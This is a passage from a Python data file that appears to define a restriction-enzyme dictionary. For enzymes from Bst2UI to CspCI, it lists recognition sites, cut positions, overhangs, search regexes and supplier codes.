            '(?=(?P<Bst2UI>CC[AT]GG))', ('I', 'V'))
_add_enzyme('Bst4CI', 'ACNGT', 256.0, 3, -3, 1, 'N',
            '(?=(?P<Bst4CI>AC.GT))', ('I', 'V'))
_add_enzyme('Bst6I', 'CTCTTC', 4096.0, 7, 4, -3, 'NNN',
            '(?=(?P<Bst6I>CTCTTC))|(?=(?P<Bst6I_as>GAAGAG))', ('I', 'V'))
_add_enzyme('BstACI', 'GRCGYC', 1024.0, 2, -2, -2, 'CG',
            '(?=(?P<BstACI>G[AG]CG[CT]C))', ('I',))
_add_enzyme('BstAFI', 'CTTAAG', 4096.0, 1, -1, -4, 'TTAA',
            '(?=(?P<BstAFI>CTTAAG))', ('I',))
_add_enzyme('BstAPI', 'GCANNNNNTGC', 4096.0, 7, -7, 3, 'NNN',
            '(?=(?P<BstAPI>GCA.....TGC))', ('I', 'N'))
_add_enzyme('BstAUI', 'TGTACA', 4096.0, 1, -1, -4, 'GTAC',
            '(?=(?P<BstAUI>TGTACA))', ('I', 'V'))
_add_enzyme('BstBAI', 'YACGTR', 1024.0, 3, -3, 0, '',
            '(?=(?P<BstBAI>[CT]ACGT[AG]))', ('I', 'V'))
_add_enzyme('BstBI', 'TTCGAA', 4096.0, 2, -2, -2, 'CG',
            '(?=(?P<BstBI>TTCGAA))', ('N',))
_add_enzyme('BstC8I', 'GCNNGC', 256.0, 3, -3, 0, '',
            '(?=(?P<BstC8I>GC..GC))', ('I',))
_add_enzyme('BstDEI', 'CTNAG', 256.0, 1, -1, -3, 'TNA',
            '(?=(?P<BstDEI>CT.AG))', ('I', 'V'))
_add_enzyme('BstDSI', 'CCRYGG', 1024.0, 1, -1, -4, 'CRYG',
            '(?=(?P<BstDSI>CC[AG][CT]GG))', ('I', 'V'))
_add_enzyme('BstEII', 'GGTNACC', 4096.0, 1, -1, -5, 'GTNAC',
            '(?=(?P<BstEII>GGT.ACC))', ('C', 'J', 'N', 'R'))
_add_enzyme('BstENI', 'CCTNNNNNAGG', 4096.0, 5, -5, -1, 'N',
            '(?=(?P<BstENI>CCT.....AGG))', ('I', 'V'))
_add_enzyme('BstF5I', 'GGATG', 1024.0, 7, 0, 2, 'NN',
            '(?=(?P<BstF5I>GGATG))|(?=(?P<BstF5I_as>CATCC))', ('I', 'V'))
_add_enzyme('BstFNI', 'CGCG', 256.0, 2, -2, 0, '',
            '(?=(?P<BstFNI>CGCG))', ('I', 'V'))
_add_enzyme('BstH2I', 'RGCGCY', 1024.0, 5, -5, 4, 'GCGC',
            '(?=(?P<BstH2I>[AG]GCGC[CT]))', ('I', 'V'))
_add_enzyme('BstHHI', 'GCGC', 256.0, 3, -3, 2, 'CG',
            '(?=(?P<BstHHI>GCGC))', ('I', 'V'))
_add_enzyme('BstKTI', 'GATC', 256.0, 3, -3, 2, 'AT',
            '(?=(?P<BstKTI>GATC))', ('I',))
_add_enzyme('BstMAI', 'GTCTC', 1024.0, 6, 5, -4, 'NNNN',
            '(?=(?P<BstMAI>GTCTC))|(?=(?P<BstMAI_as>GAGAC))', ('I', 'V'))
_add_enzyme('BstMBI', 'GATC', 256.0, 0, 0, -4, 'GATC',
            '(?=(?P<BstMBI>GATC))', ('I', 'V'))
_add_enzyme('BstMCI', 'CGRYCG', 1024.0, 4, -4, 2, 'RY',
            '(?=(?P<BstMCI>CG[AG][CT]CG))', ('I', 'V'))
_add_enzyme('BstMWI', 'GCNNNNNNNGC', 256.0, 7, -7, 3, 'NNN',
            '(?=(?P<BstMWI>GC.......GC))', ('I',))
_add_enzyme('BstNI', 'CCWGG', 512.0, 2, -2, -1, 'W',
            '(?=(?P<BstNI>CC[AT]GG))', ('N',))
_add_enzyme('BstNSI', 'RCATGY', 1024.0, 5, -5, 4, 'CATG',
            '(?=(?P<BstNSI>[AG]CATG[CT]))', ('I', 'V'))
_add_enzyme('BstPAI', 'GACNNNNGTC', 4096.0, 5, -5, 0, '',
            '(?=(?P<BstPAI>GAC....GTC))', ('I', 'V'))
_add_enzyme('BstPI', 'GGTNACC', 4096.0, 1, -1, -5, 'GTNAC',
            '(?=(?P<BstPI>GGT.ACC))', ('K',))
_add_enzyme('BstSCI', 'CCNGG', 256.0, 0, 0, -5, 'CCNGG',
            '(?=(?P<BstSCI>CC.GG))', ('I',))
_add_enzyme('BstSFI', 'CTRYAG', 1024.0, 1, -1, -4, 'TRYA',
            '(?=(?P<BstSFI>CT[AG][CT]AG))', ('I',))
_add_enzyme('BstSLI', 'GKGCMC', 1024.0, 5, -5, 4, 'KGCM',
            '(?=(?P<BstSLI>G[GT]GC[AC]C))', ('I',))
_add_enzyme('BstSNI', 'TACGTA', 4096.0, 3, -3, 0, '',
            '(?=(?P<BstSNI>TACGTA))', ('I', 'V'))
_add_enzyme('BstUI', 'CGCG', 256.0, 2, -2, 0, '',
            '(?=(?P<BstUI>CGCG))', ('N',))
_add_enzyme('BstV1I', 'GCAGC', 1024.0, 13, 12, -4, 'NNNN',
            '(?=(?P<BstV1I>GCAGC))|(?=(?P<BstV1I_as>GCTGC))', ('I',))
_add_enzyme('BstV2I', 'GAAGAC', 4096.0, 8, 6, -4, 'NNNN',
            '(?=(?P<BstV2I>GAAGAC))|(?=(?P<BstV2I_as>GTCTTC))', ('I', 'V'))
_add_enzyme('BstX2I', 'RGATCY', 1024.0, 1, -1, -4, 'GATC',
            '(?=(?P<BstX2I>[AG]GATC[CT]))', ('I', 'V'))
_add_enzyme('BstXI', 'CCANNNNNNTGG', 4096.0, 8, -8, 4, 'NNNN',
            '(?=(?P<BstXI>CCA......TGG))',
            ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'V', 'X', 'Y'))
_add_enzyme('BstYI', 'RGATCY', 1024.0, 1, -1, -4, 'GATC',
            '(?=(?P<BstYI>[AG]GATC[CT]))', ('N',))
_add_enzyme('BstZ17I', 'GTATAC', 4096.0, 3, -3, 0, '',
            '(?=(?P<BstZ17I>GTATAC))', ('N',))
_add_enzyme('BstZI', 'CGGCCG', 4096.0, 1, -1, -4, 'GGCC',
            '(?=(?P<BstZI>CGGCCG))', ('R',))
_add_enzyme('Bsu15I', 'ATCGAT', 4096.0, 2, -2, -2, 'CG',
            '(?=(?P<Bsu15I>ATCGAT))', ('B',))
_add_enzyme('Bsu36I', 'CCTNAGG', 4096.0, 2, -2, -3, 'TNA',
            '(?=(?P<Bsu36I>CCT.AGG))', ('N',))
_add_enzyme('BsuI', 'GTATCC', 4096.0, 12, 5, 1, 'N',
            '(?=(?P<BsuI>GTATCC))|(?=(?P<BsuI_as>GGATAC))', ('I',))
_add_enzyme('BsuRI', 'GGCC', 256.0, 2, -2, 0, '',
            '(?=(?P<BsuRI>GGCC))', ('B', 'I'))
_add_enzyme('BsuTUI', 'ATCGAT', 4096.0, 2, -2, -2, 'CG',
            '(?=(?P<BsuTUI>ATCGAT))', ('X',))
_add_enzyme('BtgI', 'CCRYGG', 1024.0, 1, -1, -4, 'CRYG',
            '(?=(?P<BtgI>CC[AG][CT]GG))', ('N',))
_add_enzyme('BtgZI', 'GCGATG', 4096.0, 16, 14, -4, 'NNNN',
            '(?=(?P<BtgZI>GCGATG))|(?=(?P<BtgZI_as>CATCGC))', ('N',))
_add_enzyme('BthCI', 'GCNGC', 256.0, 4, -4, 3, 'CNG',
            '(?=(?P<BthCI>GC.GC))', ())
_add_enzyme('BtrI', 'CACGTC', 4096.0, 3, -3, 0, '',
            '(?=(?P<BtrI>CACGTC))|(?=(?P<BtrI_as>GACGTG))', ('I',))
_add_enzyme('BtsCI', 'GGATG', 1024.0, 7, 0, 2, 'NN',
            '(?=(?P<BtsCI>GGATG))|(?=(?P<BtsCI_as>CATCC))', ('N',))
_add_enzyme('BtsI', 'GCAGTG', 4096.0, 8, 0, 2, 'NN',
            '(?=(?P<BtsI>GCAGTG))|(?=(?P<BtsI_as>CACTGC))', ('N',))
_add_enzyme('BtsIMutI', 'CAGTG', 1024.0, 7, 0, 2, 'NN',
            '(?=(?P<BtsIMutI>CAGTG))|(?=(?P<BtsIMutI_as>CACTG))', ('N',))
_add_enzyme('BtuMI', 'TCGCGA', 4096.0, 3, -3, 0, '',
            '(?=(?P<BtuMI>TCGCGA))', ('V',))
_add_enzyme('Bve1B23I', 'GACNNNNNTGG', 4096.0, None, None, None, None,
            '(?=(?P<Bve1B23I>GAC.....TGG))|(?=(?P<Bve1B23I_as>CCA.....GTC))', ())
_add_enzyme('BveI', 'ACCTGC', 4096.0, 10, 8, -4, 'NNNN',
            '(?=(?P<BveI>ACCTGC))|(?=(?P<BveI_as>GCAGGT))', ('B',))
_add_enzyme('Cac8I', 'GCNNGC', 256.0, 3, -3, 0, '',
            '(?=(?P<Cac8I>GC..GC))', ('N',))
_add_enzyme('CaiI', 'CAGNNNCTG', 4096.0, 6, -6, 3, 'NNN',
            '(?=(?P<CaiI>CAG...CTG))', ('B',))
_add_enzyme('Cal14237I', 'GGTTAG', 4096.0, None, None, None, None,
            '(?=(?P<Cal14237I>GGTTAG))|(?=(?P<Cal14237I_as>CTAACC))', ())
_add_enzyme('CalB3II', 'GRTTRAG', 4096.0, None, None, None, None,
            '(?=(?P<CalB3II>G[AG]TT[AG]AG))|(?=(?P<CalB3II_as>CT[CT]AA[CT]C))', ())
_add_enzyme('Cau10061II', 'GTTAAT', 4096.0, None, None, None, None,
            '(?=(?P<Cau10061II>GTTAAT))|(?=(?P<Cau10061II_as>ATTAAC))', ())
_add_enzyme('CauII', 'CCSGG', 512.0, 2, -2, -1, 'S',
            '(?=(?P<CauII>CC[CG]GG))', ())
_add_enzyme('Cba13II', 'AGGAAT', 4096.0, None, None, None, None,
            '(?=(?P<Cba13II>AGGAAT))|(?=(?P<Cba13II_as>ATTCCT))', ())
_add_enzyme('Cba16038I', 'CCTNAYNC', 2048.0, None, None, None, None,
            '(?=(?P<Cba16038I>CCT.A[CT].C))|(?=(?P<Cba16038I_as>G.[AG]T.AGG))', ())
_add_enzyme('Cbo67071IV', 'GCRGAAG', 8192.0, None, None, None, None,
            '(?=(?P<Cbo67071IV>GC[AG]GAAG))|(?=(?P<Cbo67071IV_as>CTTC[CT]GC))', ())
_add_enzyme('Cch467III', 'GNGAAAY', 2048.0, None, None, None, None,
            '(?=(?P<Cch467III>G.GAAA[CT]))|(?=(?P<Cch467III_as>[AG]TTTC.C))', ())
_add_enzyme('CchII', 'GGARGA', 2048.0, 17, 9, 2, 'NN',
            '(?=(?P<CchII>GGA[AG]GA))|(?=(?P<CchII_as>TC[CT]TCC))', ())
_add_enzyme('CchIII', 'CCCAAG', 4096.0, 26, 18, 2, 'NN',
            '(?=(?P<CchIII>CCCAAG))|(?=(?P<CchIII_as>CTTGGG))', ())
_add_enzyme('CciI', 'TCATGA', 4096.0, 1, -1, -4, 'CATG',
            '(?=(?P<CciI>TCATGA))', ('I',))
_add_enzyme('CciNI', 'GCGGCCGC', 65536.0, 2, -2, -4, 'GGCC',
            '(?=(?P<CciNI>GCGGCCGC))', ('I', 'V'))
_add_enzyme('Cco14983V', 'GGGTDA', 1365.3333333333333, None, None, None, None,
            '(?=(?P<Cco14983V>GGGT[AGT]A))|(?=(?P<Cco14983V_as>T[ACT]ACCC))', ())
_add_enzyme('Cco14983VI', 'GCYGA', 512.0, None, None, None, None,
            '(?=(?P<Cco14983VI>GC[CT]GA))|(?=(?P<Cco14983VI_as>TC[AG]GC))', ())
_add_enzyme('CcrNAIII', 'CGACCAG', 16384.0, None, None, None, None,
            '(?=(?P<CcrNAIII>CGACCAG))|(?=(?P<CcrNAIII_as>CTGGTCG))', ())
_add_enzyme('Cdi11397I', 'GCGCAG', 4096.0, None, None, None, None,
            '(?=(?P<Cdi11397I>GCGCAG))|(?=(?P<Cdi11397I_as>CTGCGC))', ())
_add_enzyme('CdiI', 'CATCG', 1024.0, 4, -1, 0, '',
            '(?=(?P<CdiI>CATCG))|(?=(?P<CdiI_as>CGATG))', ())
_add_enzyme('CdpI', 'GCGGAG', 4096.0, 26, 18, 2, 'NN',
            '(?=(?P<CdpI>GCGGAG))|(?=(?P<CdpI_as>CTCCGC))', ())
def _temp():
return {
'charac': (None, None, None, None, 'GTGAAG'),
'compsite': '(?=(?P<Cdu23823II>GTGAAG))|(?=(?P<Cdu23823II_as>CTTCAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cdu23823II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<CfoI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('M', 'R', 'S'),
}
rest_dict['CfoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<Cfr10I>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Cfr10I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<Cfr13I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr13I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<Cfr42I>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr42I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCGGG'),
'compsite': '(?=(?P<Cfr9I>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Cfr9I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<CfrI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCANCC'),
'compsite': '(?=(?P<CfrMH13II>AGCA.CC))|(?=(?P<CfrMH13II_as>GG.TGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCANCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrMH13II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTAAAG'),
'compsite': '(?=(?P<CfrMH16VI>CTAAAG))|(?=(?P<CfrMH16VI_as>CTTTAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CfrMH16VI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GARCAG'),
'compsite': '(?=(?P<Cfupf3II>GA[AG]CAG))|(?=(?P<Cfupf3II_as>CTG[CT]TC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GARCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cfupf3II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGCA'),
'compsite': '(?=(?P<Cgl13032I>GGCGCA))|(?=(?P<Cgl13032I_as>TGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cgl13032I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACGABGG'),
'compsite': '(?=(?P<Cgl13032II>ACGA[CGT]GG))|(?=(?P<Cgl13032II_as>CC[ACG]TCGT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGABGG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cgl13032II'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GATC'),
'compsite': '(?=(?P<ChaI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ChaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKAAGC'),
'compsite': '(?=(?P<Cje265V>G[GT]AAGC))|(?=(?P<Cje265V_as>GCTT[AC]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cje265V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKAAYC'),
'compsite': '(?=(?P<Cje54107III>G[GT]AA[CT]C))|(?=(?P<Cje54107III_as>G[AG]TT[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAYC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cje54107III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCAAGG'),
'compsite': '(?=(?P<CjeFIII>GCAAGG))|(?=(?P<CjeFIII_as>CCTTGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAAGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeFIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGRCA'),
'compsite': '(?=(?P<CjeFV>GG[AG]CA))|(?=(?P<CjeFV_as>TG[CT]CC))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGRCA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeFV'] = _temp()
def _temp():
return {
'charac': (-8, -25, 26, 9, 'CCANNNNNNGT'),
'compsite': '(?=(?P<CjeI>CCA......GT))|(?=(?P<CjeI_as>AC......TGG))',
'dna': None,
'freq': 1024.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 6,
'ovhgseq': 'NNNNNN',
'results': None,
'scd3': 9,
'scd5': 26,
'site': 'CCANNNNNNGT',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGNNNNNGT'),
'compsite': '(?=(?P<CjeNII>GAG.....GT))|(?=(?P<CjeNII_as>AC.....CTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGNNNNNGT',
'size': 10,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNII'] = _temp()
def _temp():
return {
'charac': (25, 17, None, None, 'GKAAYG'),
'compsite': '(?=(?P<CjeNIII>G[GT]AA[CT]G))|(?=(?P<CjeNIII_as>C[AG]TT[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': 17,
'fst5': 25,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKAAYG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCYGA'),
'compsite': '(?=(?P<CjeNV>CC[CT]GA))|(?=(?P<CjeNV_as>TC[AG]GG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCYGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeNV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACNNNNNNNGAA'),
'compsite': '(?=(?P<CjeP659IV>CAC.......GAA))|(?=(?P<CjeP659IV_as>TTC.......GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNNNNNGAA',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjeP659IV'] = _temp()
def _temp():
return {
'charac': (-7, -25, 26, 8, 'CCANNNNNNNTC'),
'compsite': '(?=(?P<CjePI>CCA.......TC))|(?=(?P<CjePI_as>GA.......TGG))',
'dna': None,
'freq': 1024.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 6,
'ovhgseq': 'NNNNNN',
'results': None,
'scd3': 8,
'scd5': 26,
'site': 'CCANNNNNNNTC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjePI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAYNNNNNRTG'),
'compsite': '(?=(?P<CjuI>CA[CT].....[AG]TG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNNRTG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjuI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAYNNNNNCTC'),
'compsite': '(?=(?P<CjuII>CA[CT].....CTC))|(?=(?P<CjuII_as>GAG.....[AG]TG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNNCTC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CjuII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAA'),
'compsite': '(?=(?P<Cla11845III>GCGAA))|(?=(?P<Cla11845III_as>TTCGC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cla11845III'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<ClaI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['ClaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AAAAGRG'),
'compsite': '(?=(?P<Cly7489II>AAAAG[AG]G))|(?=(?P<Cly7489II_as>C[CT]CTTTT))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAAAGRG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cly7489II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGAAG'),
'compsite': '(?=(?P<Cma23826I>CGGAAG))|(?=(?P<Cma23826I_as>CTTCCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Cma23826I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<CpoI>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['CpoI'] = _temp()
def _temp():
return {
'charac': (10, 10, None, None, 'GACGC'),
'compsite': '(?=(?P<CseI>GACGC))|(?=(?P<CseI_as>GCGTC))',
'dna': None,
'freq': 1024.0,
'fst3': 10,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['CseI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCWGGT'),
'compsite': '(?=(?P<CsiI>ACC[AT]GGT))',
'dna': None,
'freq': 8192.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCWGGT',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['CsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGAGGC'),
'compsite': '(?=(?P<Csp2014I>GGAGGC))|(?=(?P<Csp2014I_as>GCCTCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGAGGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Csp2014I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTAC'),
'compsite': '(?=(?P<Csp6I>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Csp6I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<CspAI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['CspAI'] = _temp()
def _temp():
return {
'charac': (-11, -25, 24, 10, 'CAANNNNNGTGG'),
'compsite': '(?=(?P<CspCI>CAA.....GTGG))|(?=(?P<CspCI_as>CCAC.....TTG))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'CAANNNNNGTGG',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CspCI'] = _temp()
def _temp():
return {
